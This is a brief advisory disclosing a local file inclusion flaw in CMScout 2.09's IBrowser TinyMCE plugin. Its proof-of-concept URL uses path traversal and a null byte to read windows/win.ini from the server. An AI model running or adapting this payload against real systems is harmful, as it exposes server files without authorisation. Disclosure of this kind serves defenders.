------------------------------------------------------------------------
Software................CMScout 2.09 / IBrowser TinyMCE Plugin
Vulnerability...........Local File Inclusion
Download................http://www.cmscout.co.za/
Release Date............9/15/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in CMScout 2.09 / IBrowser
TinyMCE Plugin can be exploited to include arbitrary files.


--PoC--

http://localhost/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00